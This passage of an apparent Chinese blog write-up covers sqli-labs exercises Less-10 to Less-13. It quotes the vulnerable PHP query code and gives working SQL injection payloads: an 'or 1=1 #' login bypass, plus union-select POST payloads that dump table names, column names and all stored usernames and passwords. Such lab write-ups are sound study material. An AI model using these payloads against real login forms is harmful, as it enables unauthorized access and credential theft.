<h2 id="Less-10-基于时间的双引号盲注"><a href="#Less-10-基于时间的双引号盲注" class="headerlink" title="Less-10 基于时间的双引号盲注"></a>Less-10 基于时间的双引号盲注</h2><p>对比第9题的代码，发现只是<code>&#39;</code>改成<code>&quot;</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$sql=&quot;SELECT * FROM users WHERE id=&#x27;$id&#x27; LIMIT 0,1&quot;;</span><br><span class="line">//第九题</span><br><span class="line">$id = &#x27;&quot;&#x27;.$id.&#x27;&quot;&#x27;;</span><br><span class="line">$sql=&quot;SELECT * FROM users WHERE id=$id LIMIT 0,1&quot;;</span><br><span class="line">//第十题</span><br></pre></td></tr></table></figure>

<p>代码也把</p>
<p><code>1&#39; and</code>改成<code>1&quot; and</code>就可以了</p>
<h2 id="Less-11-基于错误的POST单引号字符"><a href="#Less-11-基于错误的POST单引号字符" class="headerlink" title="Less-11 基于错误的POST单引号字符"></a>Less-11 基于错误的POST单引号字符</h2><p>前面十题都是get，然后这题是post的。</p>
<p>关键代码在这里，读入之后未做任何的处理</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">@$sql=&quot;SELECT username, password FROM users WHERE username=&#x27;$uname&#x27; and password=&#x27;$passwd&#x27; LIMIT 0,1&quot;;</span><br></pre></td></tr></table></figure>

<p>直接使用万能密码，闭合这个语句</p>
<p>先在数据库里进行尝试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; SELECT username, password FROM users WHERE username=&#x27;admin&#x27; or 1=1 #&#x27; and password=&#x27; &#x27; LIMIT 0,1&quot;;</span><br><span class="line">    -&gt; ;</span><br><span class="line">+----------+------------+</span><br><span class="line">| username | password   |</span><br><span class="line">+----------+------------+</span><br><span class="line">| Dumb     | Dumb       |</span><br><span class="line">| Angelina | I-kill-you |</span><br><span class="line">| Dummy    | p@ssword   |</span><br><span class="line">| secure   | crappy     |</span><br><span class="line">| stupid   | stupidity  |</span><br><span class="line">| superman | genious    |</span><br><span class="line">| batman   | mob!le     |</span><br><span class="line">| admin    | admin      |</span><br><span class="line">| admin1   | admin1     |</span><br><span class="line">| admin2   | admin2     |</span><br><span class="line">| admin3   | admin3     |</span><br><span class="line">| dhakkan  | dumbo      |</span><br><span class="line">| admin4   | admin4     |</span><br><span class="line">+----------+------------+</span><br></pre></td></tr></table></figure>

<p>发现可以闭合回显。所以直接在网页的用户名输入<code>admin&#39; or 1=1 #</code>即可，密码随意。</p>
<p>同样我们可以利用这个登录框进行数据库的获取。</p>
<p>由于一次只能回显两个字段，所以我们先获取数据库的名字，和get方式差不多。</p>
<p> <code>uname=1&#39; union select database(),user()#&amp;passwd=1</code> 获取数据库名</p>
<p><code>uname=1&#39; union select group_concat(table_name),2 from information_schema.tables where table_schema=&#39;security&#39;#&amp;passwd=1</code>可以将所有表名回显在第一个字段。</p>
<p>回显了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Your Login name:emails,referers,uagents,users</span><br><span class="line">Your Password:2</span><br></pre></td></tr></table></figure>

<p><code>uname=1&#39; union select group_concat(column_name),2 from information_schema.columns where table_schema=&#39;security&#39; and table_name=&#39;users&#39;#&amp;passwd=1</code> 取列名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Your Login name:id,username,password</span><br><span class="line">Your Password:2</span><br></pre></td></tr></table></figure>

<p><code>uname=1&#39; union select group_concat(username),group_concat(password) from users#&amp;passwd=1</code> 最后取字段</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4</span><br><span class="line">Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4</span><br></pre></td></tr></table></figure>

<h2 id="Less-12-基于错误的双引号POST型字符变形注入"><a href="#Less-12-基于错误的双引号POST型字符变形注入" class="headerlink" title="Less-12 基于错误的双引号POST型字符变形注入"></a>Less-12 基于错误的双引号POST型字符变形注入</h2><p>同样和get的方式是类似的</p>
<p>直接看源码，同样是进行了双引号的处理</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$uname=&#x27;&quot;&#x27;.$uname.&#x27;&quot;&#x27;;</span><br><span class="line">$passwd=&#x27;&quot;&#x27;.$passwd.&#x27;&quot;&#x27;; </span><br><span class="line">@$sql=&quot;SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1&quot;;</span><br></pre></td></tr></table></figure>

<p>我们依然先在数据库中测试，利用<code>admin&quot;) or 1=1#</code>来闭合</p>
<p>得到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; SELECT username, password FROM users WHERE username=(&quot;admin&quot;) or 1=1#&quot;) and password=(&quot;1&quot;) LIMIT 0,1;</span><br><span class="line">    -&gt; ;</span><br><span class="line">+----------+------------+</span><br><span class="line">| username | password   |</span><br><span class="line">+----------+------------+</span><br><span class="line">| Dumb     | Dumb       |</span><br><span class="line">| Angelina | I-kill-you |</span><br><span class="line">| Dummy    | p@ssword   |</span><br><span class="line">| secure   | crappy     |</span><br><span class="line">| stupid   | stupidity  |</span><br><span class="line">| superman | genious    |</span><br><span class="line">| batman   | mob!le     |</span><br><span class="line">| admin    | admin      |</span><br><span class="line">| admin1   | admin1     |</span><br><span class="line">| admin2   | admin2     |</span><br><span class="line">| admin3   | admin3     |</span><br><span class="line">| dhakkan  | dumbo      |</span><br><span class="line">| admin4   | admin4     |</span><br><span class="line">+----------+------------+</span><br></pre></td></tr></table></figure>

<p>因此我们也构造post数据<code>uname=1&quot;) or 1=1#&amp;passwd=1</code> 实现万能账号的注入</p>
<p><code>uname=1&quot;) union select database(),user()#&amp;passwd=1</code> 获取数据库名</p>
<p><code>uname=1&quot;) union select group_concat(table_name),2 from information_schema.tables where table_schema=&#39;security&#39;#&amp;passwd=1</code>，回显表名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Your Login name:emails,referers,uagents,users</span><br><span class="line">Your Password:2</span><br></pre></td></tr></table></figure>

<p><code>uname=1&quot;) union select group_concat(column_name),2 from information_schema.columns where table_name=&#39;users&#39; and table_schema=&quot;security&quot;#&amp;passwd=1</code> 取列名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Your Login name:id,username,password</span><br><span class="line">Your Password:2</span><br></pre></td></tr></table></figure>

<p><code>uname=1&quot;) union select group_concat(username),group_concat(password) from users#&amp;passwd=1</code> 取字段</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4</span><br><span class="line">Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4</span><br></pre></td></tr></table></figure>

<h2 id="Less-13-POST-单引号变形双注入"><a href="#Less-13-POST-单引号变形双注入" class="headerlink" title="Less-13 POST 单引号变形双注入"></a>Less-13 POST 单引号变形双注入</h2><p>与get的双注是一个思路的</p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>10vexh
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://10vexh.top/2022/01/02/sql-lab%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/" title="sql-lab刷题记录">http://10vexh.top/2022/01/02/sql-lab刷题记录/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/01/02/2021%E7%89%88OWASP-TOP-10/" rel="prev" title="2021版OWASP TOP 10">
      <i class="fa fa-chevron-left"></i> 2021版OWASP TOP 10
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#sql-lab%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95"><span class="nav-number">1.</span> <span class="nav-text">sql-lab刷题记录</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-1-%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E7%9A%84GET%E5%8D%95%E5%BC%95%E5%8F%B7%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">1.2.</span> <span class="nav-text">Less-1 基于错误的GET单引号字符型注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-2-%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E7%9A%84get%E6%95%B4%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">1.3.</span> <span class="nav-text">Less-2 基于错误的get整型注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-3-%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E7%9A%84get%E5%8D%95%E5%BC%95%E5%8F%B7%E5%8F%98%E5%BD%A2%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">1.4.</span> <span class="nav-text">Less-3 基于错误的get单引号变形字符型注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-4-%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E7%9A%84GET%E5%8F%8C%E5%BC%95%E5%8F%B7%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">1.5.</span> <span class="nav-text">Less-4 基于错误的GET双引号字符型注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-5-%E5%8F%8C%E6%B3%A8%E5%85%A5GET%E5%8D%95%E5%BC%95%E5%8F%B7%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">1.6.</span> <span class="nav-text">Less-5 双注入GET单引号字符型注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-6-%E5%8F%8C%E6%B3%A8%E5%85%A5GET%E5%8F%8C%E5%BC%95%E5%8F%B7%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">1.7.</span> <span class="nav-text">Less-6 双注入GET双引号字符型注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-7-%E5%AF%BC%E5%87%BA%E6%96%87%E4%BB%B6GET%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">1.8.</span> <span class="nav-text">Less-7 导出文件GET字符型注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-8-%E5%B8%83%E5%B0%94%E5%9E%8B%E5%8D%95%E5%BC%95%E5%8F%B7GET%E7%9B%B2%E6%B3%A8"><span class="nav-number">1.9.</span> <span class="nav-text">Less-8 布尔型单引号GET盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-9-%E5%9F%BA%E4%BA%8E%E6%97%B6%E9%97%B4%E7%9A%84GET%E5%8D%95%E5%BC%95%E5%8F%B7%E7%9B%B2%E6%B3%A8"><span class="nav-number">1.10.</span> <span class="nav-text">Less-9 基于时间的GET单引号盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-10-%E5%9F%BA%E4%BA%8E%E6%97%B6%E9%97%B4%E7%9A%84%E5%8F%8C%E5%BC%95%E5%8F%B7%E7%9B%B2%E6%B3%A8"><span class="nav-number">1.11.</span> <span class="nav-text">Less-10 基于时间的双引号盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-11-%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E7%9A%84POST%E5%8D%95%E5%BC%95%E5%8F%B7%E5%AD%97%E7%AC%A6"><span class="nav-number">1.12.</span> <span class="nav-text">Less-11 基于错误的POST单引号字符</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-12-%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E7%9A%84%E5%8F%8C%E5%BC%95%E5%8F%B7POST%E5%9E%8B%E5%AD%97%E7%AC%A6%E5%8F%98%E5%BD%A2%E6%B3%A8%E5%85%A5"><span class="nav-number">1.13.</span> <span class="nav-text">Less-12 基于错误的双引号POST型字符变形注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Less-13-POST-%E5%8D%95%E5%BC%95%E5%8F%B7%E5%8F%98%E5%BD%A2%E5%8F%8C%E6%B3%A8%E5%85%A5"><span class="nav-number">1.14.</span> <span class="nav-text">Less-13 POST 单引号变形双注入</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">10vexh</p>
  <div class="site-description" itemprop="description">水至清则无鱼</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">2</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; Sun Jan 02 2022 08:00:00 GMT+0800 (中国标准时间) – 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">10vexh</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>


    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    <span id="busuanzi_container_site_pv">总访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <span id="busuanzi_container_site_uv">总访客数<span id="busuanzi_value_site_uv"></span>人</span>
    <span class="post-meta-divider">|</span>
<!-- 不蒜子计数初始值纠正 -->
<script>
$(document).ready(function() {

    var int = setInterval(fixCount, 50);  // 50ms周期检测函数
    var countOffset = 20000;  // 初始化首次数据

    function fixCount() {            
       if (document.getElementById("busuanzi_container_site_pv").style.display != "none")
        {
            $("#busuanzi_value_site_pv").html(parseInt($("#busuanzi_value_site_pv").html()) + countOffset); 
            clearInterval(int);
        }                  
        if ($("#busuanzi_container_site_pv").css("display") != "none")
        {
            $("#busuanzi_value_site_uv").html(parseInt($("#busuanzi_value_site_uv").html()) + countOffset); // 加上初始数据 
            clearInterval(int); // 停止检测
        }  
    }
       	
});
</script> 


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
